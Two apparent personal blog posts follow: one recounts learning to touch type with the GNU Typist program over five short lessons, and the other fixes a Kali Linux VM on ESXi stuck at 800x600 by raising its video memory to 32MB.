Sound familiar?

I had promised myself I would learn to touch type eventually, but it would get forgotten or something else would come up which was far more important (literally anything really!).

Well holiday time finally rolled round, and I decided enough was enough and I would dig out an old typing program I looked at briefly when I first started to play with Linux. It is called GNU Typist. It’s far from elegant, it has no games to play with but has the basics, and basics it does very well. Luckily for me being on a Windows laptop there is a version available.

In all its glory.

GNU Typist at its most basic.

I opted for the quick lessons in the series, they are nice bite sized lessons to do over 5 days (as there were 5 lessons). The program tells you which fingers to use and where. The key I think is to stick with it and do the lessons on a regular basis, this is needed to re-train your fingers to go to the correct keys in the correct order. You will be much slower than your normal typing method, and you may catch yourself reverting back, but do persist. Eventually your speed will increase and you will reap the benefits. (This is actually a lot quicker than you would think.)

And in case you are wondering this entire post was typed using proper technique, with fewer mistakes and I especially liked the fact I could look elsewhere and just let my fingers do the talking (as it were).

Speed wise I am averaging a magnificently slow pace of 25 wmp but I am getting quicker the more I type. Practice definitely pays off.

Right then, thanks for reading, links below.

GNU Typist website
https://www.gnu.org/software/gtypist/index.html

Or install via apt-get or yum install (gtypist), its available in most repositories in your favourite distributions.

Kali / Linux ESXi Resolution resize issue.

Issue: Changing the desktop resolution on Linux or in my case Kali has issues in ESXi. It either fails, goes blank or displays corrupted image until it reverts itself back to 800×600.

I stumbled upon this with a new installation in a testing network I was playing with, despite installing vmtools on the client and updating them numerous times I could not get the desktop to a more usable resolution over 800×600. Was it drivers for the video card, monitor? Well after 30 mins of googling I found a solution in the Kali forums (Thanks to SpeedyQuick.)

Solution:

Increase video card memory in vSphere Client to 32MB from the default of 4MB. Then you should be able to resize to your desired resolution.

vmware_display_mem

I’d imagine if you were having similar issues with Virtualbox this solution would also apply, one thing to note though is that Virtualbox seems to default to a higher amount so I have not seen this issue yet.